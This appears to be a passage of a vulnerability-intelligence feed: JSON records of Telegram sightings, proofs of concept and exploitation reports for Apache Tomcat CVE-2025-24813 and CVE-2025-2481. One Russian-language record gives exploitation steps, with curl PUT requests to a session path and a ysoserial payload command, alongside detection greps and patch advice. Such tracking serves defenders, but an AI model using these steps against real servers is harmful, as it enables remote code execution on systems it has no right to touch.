"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2481", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/137", "content": "Poc 1 : https://github.com/iSee857/CVE-2025-2481...\nPoc 2 : https://github.com/absholi7ly/...", "creation_timestamp": "2025-03-17T08:39:20.000000Z"}, {"uuid": "ed279ba9-ddf0-48af-bfd0-f5b29932b11a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/OoyvOxhDepv_VW-3kj9cRIaGdoLcZyggYa8Ds5zdnxyRhfM", "content": "", "creation_timestamp": "2025-08-12T03:00:06.000000Z"}, {"uuid": "7cb364d0-85c2-499c-87aa-f566d42e7ced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/claytechsolution/240", "content": "The Hacker News\nApache Tomcat Vulnerability Actively Exploited Just 30 Hours After Public Disclosure\n\nA recently disclosed security flaw impacting Apache Tomcat has come under active exploitation in the wild following the release of a public proof-of-concept (PoC) a mere 30 hours after public disclosure.\nThe vulnerability, tracked as CVE-2025-24813, affects the below versions -\n\nApache Tomcat 11.0.0-M1 to 11.0.2\nApache Tomcat 10.1.0-M1 to 10.1.34\nApache Tomcat 9.0.0-M1 to 9.0.98\n\nIt concerns a", "creation_timestamp": "2025-03-17T20:45:24.000000Z"}, {"uuid": "05de0267-aef6-4065-af0f-95fbb97fad1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/o8ZKoWV2Y_A2XRg1P8qW1kiSLgUFj0IHGqQJ6A5ARyKaU-0", "content": "", "creation_timestamp": "2025-07-29T03:00:05.000000Z"}, {"uuid": "a9cd18fb-c248-4c74-a033-998f3ca73ef9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/poxek/5397", "content": "CVE-2025-24813: RCE \u0432 Apache Tomcat \u0447\u0435\u0440\u0435\u0437 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e\n#CVE #RCE #Apache #Tomcat #deser\n\nApache \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Tomcat, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u0435\u0441\u0441\u0438\u0439. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u27a1\ufe0f\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438\n\n\u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\n\u25aa\ufe0f9.0.0.M1-9.0.98\n\u25aa\ufe0f10.1.0-M1-10.1.34\n\u25aa\ufe0f11.0.0-M1-11.0.2\n\n\u27a1\ufe0f\u041c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\n\n\u0423\u0441\u043b\u043e\u0432\u0438\u044f \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438:\n1.\u0412\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 default servlet (disabled by default)\n2.\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 (enabled by default)\n3.\u0421\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0435\u0441\u0441\u0438\u0439 \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443\n4.\u0426\u0435\u043b\u0435\u0432\u043e\u0439 URL \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0434\u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0435\u0439 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u043e\u0431\u043b\u0430\u0441\u0442\u0438\n\n\u041f\u043e\u0448\u0430\u0433\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0442\u0430\u043a\u0438:\n\n\u042d\u0442\u0430\u043f 1: \u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430\nPUT /app/sessions/malicious.ser HTTP/1.1\nContent-Range: bytes 0-1023/*\nContent-Length: 1024\n\n[Serialized Java payload with malicious code]\n\u042d\u0442\u0430\u043f 2: \u0421\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441\u0435\u0441\u0441\u0438\u0439\nTomcat \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0444\u0430\u0439\u043b \u0432 session storage directory \u043d\u0430 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\u042d\u0442\u0430\u043f 3: \u0414\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u0438 \u043a \u0441\u0435\u0441\u0441\u0438\u0438\n\u041f\u0440\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0441\u0441\u0438\u0438 Tomcat \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e Java-\u043a\u043e\u0434\u0430.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0443\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\nPath Equivalence:\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043f\u0443\u0442\u0435\u0439 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 default servlet. \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c path traversal \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 security-sensitive \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438.\n\n\u0414\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0431\u0435\u0437 \u0432\u0430\u043b\u0438\u0434\u0430\u0446\u0438\u0438:\nTomcat \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043f\u0435\u0440\u0435\u0434 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 Java deserialization gadgets.\n\n\u041f\u0440\u0438\u043c\u0435\u0440\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\n# \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u043f\u0438\u0441\u0438\ncurl -X PUT \"http://target:8080/app/sessions/test.txt\" \\\n     -H \"Content-Range: bytes 0-4/*\" \\\n     -d \"test\"\n\n# \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0437\u0430\u043f\u0438\u0441\u0438 \u0444\u0430\u0439\u043b\u0430\ncurl \"http://target:8080/app/sessions/test.txt\"\n\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438:\n// \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 ysoserial \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 payload\njava -jar ysoserial.jar CommonsCollections6 \"calc.exe\" &gt; payload.ser\n\n# \u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 PUT\ncurl -X PUT \"http://target:8080/app/sessions/malicious.ser\" \\\n     -H \"Content-Range: bytes 0-$(wc -c &lt; payload.ser)/*\" \\\n     --data-binary @payload.ser\n\n\u27a1\ufe0f\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\n\n\u0418\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438:\n\u25aa\ufe0f\u041d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0435 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f\u043c \u0441\u0435\u0441\u0441\u0438\u0439\n\u25aa\ufe0f\u0424\u0430\u0439\u043b\u044b \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c .ser \u0432 \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u044b\u0445 \u043c\u0435\u0441\u0442\u0430\u0445\n\u25aa\ufe0f\u0410\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u043b\u043e\u0433\u0430\u0445\n\u25aa\ufe0f\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 Tomcat\n\n\u041c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433:\n# \u041f\u043e\u0438\u0441\u043a \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432 \u043b\u043e\u0433\u0430\u0445\ngrep \"PUT.*sessions\" /var/log/tomcat/access.log\n\n# \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0444\u0430\u0439\u043b\u043e\u0432 \u0441\u0435\u0441\u0441\u0438\u0439\nfind /opt/tomcat/work -name \"*.ser\" -type f -ls\n\u27a1\ufe0f\u0417\u0430\u0449\u0438\u0442\u043d\u044b\u0435 \u043c\u0435\u0440\u044b\n\n1. \u041d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f:\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439:\n\u25aa\ufe0f9.0.99+\n\u25aa\ufe0f10.1.35+\n\u25aa\ufe0f11.0.3+\n\n2. \u0412\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u0437\u0430\u0449\u0438\u0442\u044b:\n\n\n    default\n    org.apache.catalina.servlets.DefaultServlet\n    \n        readonly\n        true\n    \n\n3. \u041e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432:\n\n    default\n    \n        allowPartialPut\n        false\n    \n\n4. \u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438:\n\u25aa\ufe0f\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 WAF \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432\n\u25aa\ufe0f\u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043f\u0440\u0430\u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043b\u044f Tomcat\n\u25aa\ufe0f\u041c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0441\u0435\u0441\u0441\u0438\u0439\n\u25aa\ufe0f\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e session storage (Redis, DB)\n\n\ud83c\udf1a @poxek | \ud83c\udf1a \u0411\u043b\u043e\u0433 | \ud83d\udcfa YT | \ud83d\udcfa RT | \ud83d\udcfa VK", "creation_timestamp": "2025-08-01T12:58:43.000000Z"}, {"uuid": "ff816cdf-3bfb-47f0-9914-978442bc6283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/ap_security/810", "content": "#pentest\n\nApache Tomcat (CVE-2025-24813)\n\nRCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2025-24813 \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c\u0438 Apache \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435. \u0421\u043e\u043e\u0431\u0449\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Apache Tomcat \u0432\u0435\u0440\u0441\u0438\u0439 11.0.0-M1 - 11.0.2, 10.1.0-M1 - 10.1.34 \u0438 9.0.0.M1 - 9.0.98. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u043b\u0438, \u0447\u0442\u043e \u043f\u0440\u0438 \u0441\u043e\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u0438 \u0440\u044f\u0434\u0430 \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0438\u043b\u0438 \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b.\n\n\u0421 \u0441\u0430\u043c\u0438\u043c \u0436\u0435 PoC \u043c\u043e\u0436\u043d\u043e \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c\u0441\u044f \u043f\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0441\u044b\u043b\u043a\u0435.", "creation_timestamp": "2025-03-22T10:58:59.000000Z"}, {"uuid": "f5d4bbaf-32af-4842-943c-b1f249d59c03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/D0NXyM_985baSNIubq7MpndWYcs-5k6ZzZtJb0P7Z8z5aBw", "content": "", "creation_timestamp": "2025-07-12T09:00:04.000000Z"}, {"uuid": "c386a018-afe8-45cc-a12c-c89d8965017a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/xDpkA19THVkjR0nTyl_NpwrUs0WL1wYIsC2SdgiOaacVjts", "content": "", "creation_timestamp": "2025-07-07T15:00:07.000000Z"}, {"uuid": "2720e4fa-27ad-4855-88f6-0fb2b455c154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/itsec_news/5519", "content": "\u200b\u26a1\ufe0f\u0414\u0432\u0443\u0445\u044d\u0442\u0430\u043f\u043d\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 Apache Tomcat \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f\n\n\ud83d\udcac \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043b\u0430\u0441\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u0441\u0435\u0433\u043e \u0447\u0435\u0440\u0435\u0437 30 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2025-24813 , \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430:\n\nApache Tomcat 11.0.0-M1 \u2014 11.0.2;\nApache Tomcat 10.1.0-M1 \u2014 10.1.34;\nApache Tomcat 9.0.0-M1 \u2014 9.0.98.\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0438\u043b\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445. \u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0443\u0433\u0440\u043e\u0437\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442, \u0435\u0441\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043b\u044f \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u043b\u0435\u0442\u0430 (\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u043e), \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u0433\u043e PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 (\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u043b\u0438 \u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u043f\u0443\u0442\u044f\u0445 \u0438 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f\u0445 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b, \u043d\u043e \u0438 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u0432 \u043d\u0438\u0445 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0447\u0435\u0440\u0435\u0437 \u0437\u0430\u043f\u0440\u043e\u0441 PUT. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, \u0435\u0441\u043b\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0435\u0441\u0441\u0438\u044e Tomcat \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e, \u0430 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430, \u0443\u044f\u0437\u0432\u0438\u043c\u0430\u044f \u043a \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438.\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache Tomcat \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u043e\u0431\u043d\u043e\u0432\u043b\u0451\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.0.99, 10.1.35 \u0438 11.0.3. \u041e\u0434\u043d\u0430\u043a\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Wallarm \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c 